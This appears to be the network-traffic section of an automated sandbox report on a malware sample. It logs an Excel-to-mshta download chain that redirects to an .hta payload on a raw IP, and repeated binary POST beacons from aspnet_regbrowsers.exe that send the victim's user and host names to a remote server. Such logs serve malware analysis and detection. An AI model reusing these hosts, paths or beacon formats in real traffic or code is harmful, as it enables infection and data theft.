                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            33192.168.2.224920394.156.177.220803900C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 25, 2024 19:52:24.533739090 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                            Host: 94.156.177.220
                                                                                            Accept: */*
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Encoding: binary
                                                                                            Content-Key: 508F6F5C
                                                                                            Content-Length: 149
                                                                                            Connection: close
                                                                                            Oct 25, 2024 19:52:24.540107965 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                            Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                            Oct 25, 2024 19:52:25.509913921 CEST236INHTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.26.1
                                                                                            Date: Fri, 25 Oct 2024 17:52:25 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 23
                                                                                            Connection: close
                                                                                            X-Powered-By: PHP/5.4.16
                                                                                            Status: 404 Not Found
                                                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                            Data Ascii: File not found.


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            34192.168.2.224920494.156.177.220803900C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 25, 2024 19:52:25.733125925 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                            Host: 94.156.177.220
                                                                                            Accept: */*
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Encoding: binary
                                                                                            Content-Key: 508F6F5C
                                                                                            Content-Length: 149
                                                                                            Connection: close
                                                                                            Oct 25, 2024 19:52:25.739974022 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                            Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                            Oct 25, 2024 19:52:26.666554928 CEST236INHTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.26.1
                                                                                            Date: Fri, 25 Oct 2024 17:52:26 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 23
                                                                                            Connection: close
                                                                                            X-Powered-By: PHP/5.4.16
                                                                                            Status: 404 Not Found
                                                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                            Data Ascii: File not found.


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            35192.168.2.224920594.156.177.220803900C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 25, 2024 19:52:26.825233936 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                            Host: 94.156.177.220
                                                                                            Accept: */*
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Encoding: binary
                                                                                            Content-Key: 508F6F5C
                                                                                            Content-Length: 149
                                                                                            Connection: close
                                                                                            Oct 25, 2024 19:52:26.830845118 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                            Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                            Oct 25, 2024 19:52:27.798177958 CEST236INHTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.26.1
                                                                                            Date: Fri, 25 Oct 2024 17:52:27 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 23
                                                                                            Connection: close
                                                                                            X-Powered-By: PHP/5.4.16
                                                                                            Status: 404 Not Found
                                                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                            Data Ascii: File not found.


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            36192.168.2.224920694.156.177.220803900C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 25, 2024 19:52:27.954771996 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                            Host: 94.156.177.220
                                                                                            Accept: */*
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Encoding: binary
                                                                                            Content-Key: 508F6F5C
                                                                                            Content-Length: 149
                                                                                            Connection: close
                                                                                            Oct 25, 2024 19:52:27.960200071 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                            Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                            Oct 25, 2024 19:52:28.944343090 CEST236INHTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.26.1
                                                                                            Date: Fri, 25 Oct 2024 17:52:28 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 23
                                                                                            Connection: close
                                                                                            X-Powered-By: PHP/5.4.16
                                                                                            Status: 404 Not Found
                                                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                            Data Ascii: File not found.


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            37192.168.2.224920794.156.177.220803900C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 25, 2024 19:52:29.084017992 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                            Host: 94.156.177.220
                                                                                            Accept: */*
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Encoding: binary
                                                                                            Content-Key: 508F6F5C
                                                                                            Content-Length: 149
                                                                                            Connection: close
                                                                                            Oct 25, 2024 19:52:29.089464903 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                            Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                            Oct 25, 2024 19:52:30.087476015 CEST236INHTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.26.1
                                                                                            Date: Fri, 25 Oct 2024 17:52:29 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 23
                                                                                            Connection: close
                                                                                            X-Powered-By: PHP/5.4.16
                                                                                            Status: 404 Not Found
                                                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                            Data Ascii: File not found.


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            38192.168.2.224920894.156.177.22080
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 25, 2024 19:52:30.233679056 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                            Host: 94.156.177.220
                                                                                            Accept: */*
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Encoding: binary
                                                                                            Content-Key: 508F6F5C
                                                                                            Content-Length: 149
                                                                                            Connection: close
                                                                                            Oct 25, 2024 19:52:30.239135981 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                            Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                            Oct 25, 2024 19:52:31.199507952 CEST236INHTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.26.1
                                                                                            Date: Fri, 25 Oct 2024 17:52:31 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 23
                                                                                            Connection: close
                                                                                            X-Powered-By: PHP/5.4.16
                                                                                            Status: 404 Not Found
                                                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                            Data Ascii: File not found.


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            39192.168.2.224920994.156.177.22080
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 25, 2024 19:52:31.343420982 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                            Host: 94.156.177.220
                                                                                            Accept: */*
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Encoding: binary
                                                                                            Content-Key: 508F6F5C
                                                                                            Content-Length: 149
                                                                                            Connection: close
                                                                                            Oct 25, 2024 19:52:31.348968029 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                            Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                            Oct 25, 2024 19:52:32.292700052 CEST236INHTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.26.1
                                                                                            Date: Fri, 25 Oct 2024 17:52:32 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 23
                                                                                            Connection: close
                                                                                            X-Powered-By: PHP/5.4.16
                                                                                            Status: 404 Not Found
                                                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                            Data Ascii: File not found.


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            40192.168.2.224921094.156.177.22080
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 25, 2024 19:52:32.434194088 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                            Host: 94.156.177.220
                                                                                            Accept: */*
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Encoding: binary
                                                                                            Content-Key: 508F6F5C
                                                                                            Content-Length: 149
                                                                                            Connection: close
                                                                                            Oct 25, 2024 19:52:32.440484047 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                            Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                            Oct 25, 2024 19:52:33.403844118 CEST236INHTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.26.1
                                                                                            Date: Fri, 25 Oct 2024 17:52:33 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 23
                                                                                            Connection: close
                                                                                            X-Powered-By: PHP/5.4.16
                                                                                            Status: 404 Not Found
                                                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                            Data Ascii: File not found.


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            41192.168.2.224921194.156.177.22080
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 25, 2024 19:52:33.544646025 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                            Host: 94.156.177.220
                                                                                            Accept: */*
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Encoding: binary
                                                                                            Content-Key: 508F6F5C
                                                                                            Content-Length: 149
                                                                                            Connection: close
                                                                                            Oct 25, 2024 19:52:33.550208092 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                            Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                            Oct 25, 2024 19:52:34.518452883 CEST236INHTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.26.1
                                                                                            Date: Fri, 25 Oct 2024 17:52:34 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 23
                                                                                            Connection: close
                                                                                            X-Powered-By: PHP/5.4.16
                                                                                            Status: 404 Not Found
                                                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                            Data Ascii: File not found.


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            42192.168.2.224921294.156.177.22080
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 25, 2024 19:52:34.673525095 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                            Host: 94.156.177.220
                                                                                            Accept: */*
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Encoding: binary
                                                                                            Content-Key: 508F6F5C
                                                                                            Content-Length: 149
                                                                                            Connection: close
                                                                                            Oct 25, 2024 19:52:34.679063082 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                            Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                            Oct 25, 2024 19:52:35.658840895 CEST236INHTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.26.1
                                                                                            Date: Fri, 25 Oct 2024 17:52:35 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 23
                                                                                            Connection: close
                                                                                            X-Powered-By: PHP/5.4.16
                                                                                            Status: 404 Not Found
                                                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                            Data Ascii: File not found.


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            43192.168.2.224921394.156.177.22080
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 25, 2024 19:52:36.579443932 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                            Host: 94.156.177.220
                                                                                            Accept: */*
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Encoding: binary
                                                                                            Content-Key: 508F6F5C
                                                                                            Content-Length: 149
                                                                                            Connection: close
                                                                                            Oct 25, 2024 19:52:36.585141897 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                            Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                            Oct 25, 2024 19:52:37.677767038 CEST236INHTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.26.1
                                                                                            Date: Fri, 25 Oct 2024 17:52:37 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 23
                                                                                            Connection: close
                                                                                            X-Powered-By: PHP/5.4.16
                                                                                            Status: 404 Not Found
                                                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                            Data Ascii: File not found.


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.2249163188.114.97.34433556C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-10-25 17:50:44 UTC445OUTGET /gtLs6A?&volcano=wet&muscle=chilly&result=salty&perfume=jazzy&knickers=depressed&walk=sloppy&junior=alike&sweatshirt=clammy&puddle HTTP/1.1
                                                                                            Accept: */*
                                                                                            UA-CPU: AMD64
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                            Host: qrisni.me
                                                                                            Connection: Keep-Alive
                                                                                            2024-10-25 17:50:45 UTC1209INHTTP/1.1 302 Found
                                                                                            Date: Fri, 25 Oct 2024 17:50:45 GMT
                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                            Content-Length: 97
                                                                                            Connection: close
                                                                                            cross-origin-embedder-policy: require-corp
                                                                                            cross-origin-opener-policy: same-origin
                                                                                            cross-origin-resource-policy: same-origin
                                                                                            x-dns-prefetch-control: off
                                                                                            x-frame-options: SAMEORIGIN
                                                                                            strict-transport-security: max-age=15552000; includeSubDomains
                                                                                            x-download-options: noopen
                                                                                            x-content-type-options: nosniff
                                                                                            origin-agent-cluster: ?1
                                                                                            x-permitted-cross-domain-policies: none
                                                                                            referrer-policy: no-referrer
                                                                                            x-xss-protection: 0
                                                                                            location: http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta
                                                                                            vary: Accept, Accept-Encoding
                                                                                            x-do-app-origin: edb1517e-eb68-4bff-8694-91662c34bef1
                                                                                            Cache-Control: private
                                                                                            x-do-orig-status: 302
                                                                                            CF-Cache-Status: DYNAMIC
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q8mcip6UsF2EHp9TurA4twd%2BWNBeUfqJLIKpvXEWlEglG3awiVUfWhkSQkBFs9h13BnQmqKR8UJ0CgkfoOLPI%2FNrGZUH5w6nUHmDm3RJ3%2FiyweCF5KCQrm090BQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8d840cfb6a828c58-DFW
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            2024-10-25 17:50:45 UTC190INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 34 32 30 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 36 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 30 38 26 72 65 63 76 5f 62 79 74 65 73 3d 31 30 32 37 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 32 30 39 38 35 35 30 26 63 77 6e 64 3d 33 32 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 66 35 62 34 62 39 32 34 62 64 39 33 32 36 31 31 26 74 73 3d 39 35 36 26 78 3d 30 22 0d 0a 0d 0a
                                                                                            Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1420&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2808&recv_bytes=1027&delivery_rate=2098550&cwnd=32&unsent_bytes=0&cid=f5b4b924bd932611&ts=956&x=0"
                                                                                            2024-10-25 17:50:45 UTC97INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 31 37 36 2e 31 34 31 2f 34 31 2f 63 65 2f 67 72 65 61 74 74 68 69 6e 67 73 77 69 74 68 67 6f 6f 64 6e 65 77 73 67 69 76 65 6e 62 79 67 6f 64 74 68 69 6e 67 73 67 72 65 61 74 2e 68 74 61
                                                                                            Data Ascii: Found. Redirecting to http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.2249165188.114.97.34433848C:\Windows\System32\mshta.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-10-25 17:50:47 UTC469OUTGET /gtLs6A?&volcano=wet&muscle=chilly&result=salty&perfume=jazzy&knickers=depressed&walk=sloppy&junior=alike&sweatshirt=clammy&puddle HTTP/1.1
                                                                                            Accept: */*
                                                                                            Accept-Language: fr-FR
                                                                                            UA-CPU: AMD64
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                            Host: qrisni.me
                                                                                            Connection: Keep-Alive
                                                                                            2024-10-25 17:50:48 UTC1207INHTTP/1.1 302 Found
                                                                                            Date: Fri, 25 Oct 2024 17:50:48 GMT
                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                            Content-Length: 97
                                                                                            Connection: close
                                                                                            cross-origin-embedder-policy: require-corp
                                                                                            cross-origin-opener-policy: same-origin
                                                                                            cross-origin-resource-policy: same-origin
                                                                                            x-dns-prefetch-control: off
                                                                                            x-frame-options: SAMEORIGIN
                                                                                            strict-transport-security: max-age=15552000; includeSubDomains
                                                                                            x-download-options: noopen
                                                                                            x-content-type-options: nosniff
                                                                                            origin-agent-cluster: ?1
                                                                                            x-permitted-cross-domain-policies: none
                                                                                            referrer-policy: no-referrer
                                                                                            x-xss-protection: 0
                                                                                            location: http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta
                                                                                            vary: Accept, Accept-Encoding
                                                                                            x-do-app-origin: edb1517e-eb68-4bff-8694-91662c34bef1
                                                                                            Cache-Control: private
                                                                                            x-do-orig-status: 302
                                                                                            CF-Cache-Status: DYNAMIC
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cAmjc6O2M2jxub4VsQsb4hSUbnDKN7f78bcbNAnr2Wwhtl%2BZV7T9S2FGKm8P7LAETyDZDAOAKJBBRTN%2FDsSZEjj5B8AYiJ8dNxRWTm3fQ1FFK1ZBJmIwevOYx8g%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8d840d0e48e06c54-DFW
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            2024-10-25 17:50:48 UTC190INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 39 39 35 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 36 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 30 39 26 72 65 63 76 5f 62 79 74 65 73 3d 31 30 35 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 32 36 38 33 39 36 36 26 63 77 6e 64 3d 32 35 30 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 63 66 64 66 33 30 63 66 61 30 36 63 63 62 38 35 26 74 73 3d 35 31 38 26 78 3d 30 22 0d 0a 0d 0a
                                                                                            Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=995&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2809&recv_bytes=1051&delivery_rate=2683966&cwnd=250&unsent_bytes=0&cid=cfdf30cfa06ccb85&ts=518&x=0"
                                                                                            2024-10-25 17:50:48 UTC97INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 31 37 36 2e 31 34 31 2f 34 31 2f 63 65 2f 67 72 65 61 74 74 68 69 6e 67 73 77 69 74 68 67 6f 6f 64 6e 65 77 73 67 69 76 65 6e 62 79 67 6f 64 74 68 69 6e 67 73 67 72 65 61 74 2e 68 74 61
                                                                                            Data Ascii: Found. Redirecting to http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            2192.168.2.2249167188.114.97.34433556C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-10-25 17:51:05 UTC445OUTGET /gtLs6A?&volcano=wet&muscle=chilly&result=salty&perfume=jazzy&knickers=depressed&walk=sloppy&junior=alike&sweatshirt=clammy&puddle HTTP/1.1
                                                                                            Accept: */*
                                                                                            UA-CPU: AMD64
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                            Host: qrisni.me
                                                                                            Connection: Keep-Alive
                                                                                            2024-10-25 17:51:05 UTC1209INHTTP/1.1 302 Found
                                                                                            Date: Fri, 25 Oct 2024 17:51:05 GMT
                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                            Content-Length: 97
                                                                                            Connection: close
                                                                                            cross-origin-embedder-policy: require-corp
                                                                                            cross-origin-opener-policy: same-origin
                                                                                            cross-origin-resource-policy: same-origin
                                                                                            x-dns-prefetch-control: off
                                                                                            x-frame-options: SAMEORIGIN
                                                                                            strict-transport-security: max-age=15552000; includeSubDomains
                                                                                            x-download-options: noopen
                                                                                            x-content-type-options: nosniff
                                                                                            origin-agent-cluster: ?1
                                                                                            x-permitted-cross-domain-policies: none
                                                                                            referrer-policy: no-referrer
                                                                                            x-xss-protection: 0
                                                                                            location: http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta
                                                                                            vary: Accept, Accept-Encoding
                                                                                            x-do-app-origin: edb1517e-eb68-4bff-8694-91662c34bef1
                                                                                            Cache-Control: private
                                                                                            x-do-orig-status: 302
                                                                                            CF-Cache-Status: DYNAMIC
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yke%2ForfWSVDFbw%2FPZip4aERFALHtNiQfgQz2qPe283BRV1LRB1IID1nDfJ8G8w1qsnq5eeK1qQpLSbuf1Bu1Fq0i2%2Bw7q4izlTM7hwLgz08A9HB2c0n7VD73Ji4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8d840d799a286c33-DFW
                                                                                            alt-svc: h3=":443"; ma=86400
